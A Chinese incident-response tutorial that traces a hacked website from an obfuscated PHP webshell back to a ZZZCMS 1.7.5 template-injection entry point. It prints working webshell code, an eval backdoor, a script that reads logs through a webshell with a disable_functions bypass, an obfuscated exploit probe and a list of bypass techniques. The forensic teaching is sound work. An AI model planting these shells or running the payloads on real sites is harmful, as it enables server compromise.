从后门开展的应急响应溯源实战教学<\/h1>

1. 背景与概述<\/h2>

本教学文档基于一次真实的应急响应案例，展示了如何从一个Web后门开始，通过日志分析和漏洞溯源，最终找到最初攻击者的完整过程。案例中涉及的技术点包括：<\/p>

Web后门分析与利用<\/li>
禁用函数绕过技术<\/li>
日志分析方法<\/li>
漏洞利用链还原<\/li>

攻击者行为分析<\/li> <\/ul>

2. 后门分析与初步利用<\/h2>

2.1 后门定位<\/h3>

后门URL：http:\/\/www.xxxx.com\/plugins\/layer\/mobile\/need\/wwConapp.php<\/code><\/p>

后门代码：<\/p>

<?<\/span>php<\/span> 
<\/span><\/span>function<\/span> fun2<\/span> (){
<\/span><\/span>    $b =<\/span> $_POST ;
<\/span><\/span>    return<\/span> @<\/span> ( $b [ a<\/span> ]);
<\/span><\/span>}
<\/span><\/span>@<\/span> extract<\/span> ( array<\/span> ( b<\/span> =><\/span> create_function<\/span> ( NULL<\/span> , fun2<\/span> ())));
<\/span><\/span>@<\/span> extract<\/span> ( array<\/span> ( c<\/span> =><\/span> $b ()));
<\/span><\/span>?><\/span> 
<\/span><\/span><\/span>hello
<\/span><\/span><\/span><\/code><\/pre>2.2 后门技术分析<\/h3>

该后门使用create_function<\/code>创建匿名函数<\/li>
通过extract<\/code>函数将变量导入当前符号表<\/li>
最终执行通过POST参数a<\/code>传入的代码<\/li>
<\/ol>
2.3 利用受阻与解决方案<\/h3>


问题<\/strong>：使用蚁剑连接后发现命令执行返回127，检查phpinfo发现禁用函数：<\/p>
disable_functions: exec,passthru,popen,proc_open,shell_exec,system,assert
<\/code><\/pre>
<\/li>

解决方案<\/strong>：在同目录下发现前人留下的bypass_disablefunc_x.so<\/code>文件，可直接用于绕过禁用函数限制<\/p>
<\/li>
<\/ul>
3. 日志收集与分析<\/h2>
3.1 日志收集脚本<\/h3>
使用Python脚本批量收集2020年4月1日至12月31日的访问日志：<\/p>
#coding:utf-8<\/span>
<\/span><\/span>import<\/span> requests
<\/span><\/span>
<\/span><\/span>for<\/span> month in<\/span> range(4<\/span>,13<\/span>):
<\/span><\/span>    for<\/span> days in<\/span> range(1<\/span>,31<\/span>):
<\/span><\/span>        date =<\/span> '<\/span>%02d<\/span>'<\/span>%<\/span>month +<\/span> '<\/span>%02d<\/span>'<\/span>%<\/span>days
<\/span><\/span>        url =<\/span> 'http:\/\/www.xxxx.com\/plugins\/layer\/mobile\/need\/back.php?cmd=cat%20\/lnweb08\/domain\/3\/8\/5\/38583\/logs\/access_log.2020'<\/span> +<\/span> date +<\/span> '&outpath=\/tmp\/1&sopath=\/lnweb08\/domain\/3\/8\/5\/38583\/www\/plugins\/layer\/mobile\/need\/bypass_disablefunc_x.so'<\/span>
<\/span><\/span>        res =<\/span> requests.<\/span>get(url=<\/span>url)
<\/span><\/span>        fp =<\/span> open(date+<\/span>'.txt'<\/span>,'w'<\/span>)
<\/span><\/span>        fp.<\/span>write(res.<\/span>content)
<\/span><\/span>        fp.<\/span>close()
<\/span><\/span><\/code><\/pre>3.2 关键时间点定位<\/h3>

后门文件wwConapp.php<\/code>创建时间：2020-11-06 09:34:19<\/li>
相关访问记录：
115.238.195.188 - - [06\/Nov\/2020:09:34:37 +0800] "POST \/\/plugins\/layer\/mobile\/need\/Conapp.php HTTP\/1.1" 500 -
115.238.195.188 - - [06\/Nov\/2020:09:34:38 +0800] "POST \/\/plugins\/layer\/mobile\/need\/Conapp.php HTTP\/1.1" 200 180
115.238.195.188 - - [06\/Nov\/2020:09:34:39 +0800] "POST \/\/plugins\/layer\/mobile\/need\/Conapp.php HTTP\/1.1" 200 161
<\/code><\/pre>
<\/li>
<\/ul>
3.3 攻击者IP行为分析<\/h3>
对IP 115.238.195.188<\/code>的访问记录分析：<\/p>
115.238.195.188 - - [06\/Nov\/2020:09:22:58 +0800] "POST \/search\/2.php HTTP\/1.1" 200 161
115.238.195.188 - - [06\/Nov\/2020:09:22:59 +0800] "POST \/search\/2.php HTTP\/1.1" 200 153
115.238.195.188 - - [06\/Nov\/2020:09:23:02 +0800] "POST \/search\/2.php HTTP\/1.1" 200 8
...
115.238.195.188 - - [06\/Nov\/2020:09:23:09 +0800] "GET \/xiseceshi.jsp HTTP\/1.1" 200 16
<\/code><\/pre>
发现该攻击者从\/search\/2.php<\/code>开始访问，但该文件已被删除，仅剩同目录下的1.php<\/code>：<\/p>
<?<\/span>php<\/span> @<\/span> $content =<\/span> @<\/span> stripslashes<\/span>(\/**\/<\/span> @<\/span>$_POST[1<\/span>]); @<\/span> eval<\/span>(''<\/span>.\/**\/<\/span> $content);
<\/span><\/span><\/code><\/pre>4. 初始攻击溯源<\/h2>
4.1 最早的后门访问记录<\/h3>
查找\/search\/2.php<\/code>的最早访问记录：<\/p>
180.126.246.121 - - [28\/Aug\/2020:05:00:01 +0800] "HEAD \/search\/2.php HTTP\/1.1" 200 -
180.126.246.121 - - [28\/Aug\/2020:05:00:01 +0800] "POST \/search\/2.php HTTP\/1.1" 200 7
<\/code><\/pre>
4.2 攻击向量分析<\/h3>
IP 180.126.246.121<\/code>的攻击流量：<\/p>
\/search\/?keys={if:array_map(base_convert(31298929054286,10,32),array((base_convert(10,10,36)^base_convert(25,10,36)^base_convert(3,10,36)).yizogi.(base_convert(10,10,36)^base_convert(25,10,36)^base_convert(3,10,36))))}{endif}
<\/code><\/pre>
解码分析：<\/p>

base_convert(31298929054286,10,32)<\/code> → "setcookie"<\/li>
base_convert(10,10,36)^base_convert(25,10,36)^base_convert(3,10,36)<\/code> → 解码后为空字符串<\/li>
整体效果：setcookie("yizogi", "")<\/code><\/li>
<\/ol>
这是一个探测性的攻击，用于检查是否存在模板注入漏洞。<\/p>
4.3 漏洞确认<\/h3>
该攻击利用的是ZZZCMS 1.7.5的前台RCE漏洞，相关特征：<\/p>

通过模板变量注入执行代码<\/li>
利用base_convert等函数混淆攻击payload<\/li>
漏洞利用成功后会在响应中设置特定cookie<\/li>
<\/ul>
5. 攻击链还原<\/h2>
完整的攻击时间线：<\/p>


初始入侵<\/strong>（2020-08-28）：<\/p>

IP 180.126.246.121<\/code>利用ZZZCMS 1.7.5漏洞上传\/search\/2.php<\/code>后门<\/li>
<\/ul>
<\/li>

后续利用<\/strong>（2020-11-06）：<\/p>

IP 115.238.195.188<\/code>利用已有后门，在\/plugins\/layer\/mobile\/need\/<\/code>目录上传Conapp.php<\/code>后门<\/li>
后将该文件重命名为wwConapp.php<\/code><\/li>
<\/ul>
<\/li>

后门维护<\/strong>：<\/p>

攻击者在\/search\/<\/code>目录下留下1.php<\/code>作为备用后门<\/li>
在\/plugins\/layer\/mobile\/need\/<\/code>目录留下bypass_disablefunc_x.so<\/code>用于绕过禁用函数限制<\/li>
<\/ul>
<\/li>
<\/ol>
6. 防护建议<\/h2>

及时更新<\/strong>：确保CMS系统及时更新到最新版本<\/li>
禁用危险函数<\/strong>：在php.ini中禁用危险函数<\/li>
日志监控<\/strong>：实施实时日志监控，对可疑访问模式设置告警<\/li>
文件完整性检查<\/strong>：定期检查网站目录的文件变动<\/li>
最小权限原则<\/strong>：Web服务器进程应以最低必要权限运行<\/li>
<\/ol>
7. 高级溯源技术展望<\/h2>
文中提出的基于图谱的响应溯源追踪系统构想：<\/p>

数据层<\/strong>：将所有日志导入图数据库<\/li>
分析层<\/strong>：

使用图查询语句分析访问模式<\/li>
结合正则表达式和AI检测可疑行为<\/li>
<\/ul>
<\/li>
可视化层<\/strong>：自动生成攻击路径图，辅助人工判断<\/li>
<\/ol>
8. 附录：相关技术点详解<\/h2>
8.1 禁用函数绕过技术<\/h3>
常见绕过方法：<\/p>

使用LD_PRELOAD加载恶意.so文件<\/li>
利用imap_open等未被禁用的函数<\/li>
通过PHP的FFI扩展<\/li>
使用反引号(``)执行命令<\/li>
<\/ol>
8.2 日志分析技巧<\/h3>

时间线分析：围绕关键文件的时间戳展开<\/li>
IP关联：同一IP的连续访问行为<\/li>
异常请求：识别非常规的URL和参数<\/li>
状态码分析：关注200以外的响应码<\/li>
<\/ol>
8.3 漏洞利用特征<\/h3>
ZZZCMS 1.7.5 RCE漏洞特征：<\/p>

使用base_convert等函数混淆<\/li>
模板注入语法特征<\/li>
通常伴随文件上传行为<\/li>
探测阶段会设置特定cookie<\/li>
<\/ol>

从后门开展的应急响应溯源实战教学<\/h1>

2. 后门分析与初步利用<\/h2>

4. 初始攻击溯源<\/h2>

8. 附录：相关技术点详解<\/h2>

8.3 漏洞利用特征<\/h3> ZZZCMS 1.7.5 RCE漏洞特征：<\/p> 使用base_convert等函数混淆<\/li> 模板注入语法特征<\/li> 通常伴随文件上传行为<\/li> 探测阶段会设置特定cookie<\/li> <\/ol>

8.3 漏洞利用特征<\/h3>
ZZZCMS 1.7.5 RCE漏洞特征：<\/p>

使用base_convert等函数混淆<\/li>
模板注入语法特征<\/li>
通常伴随文件上传行为<\/li>
探测阶段会设置特定cookie<\/li> <\/ol>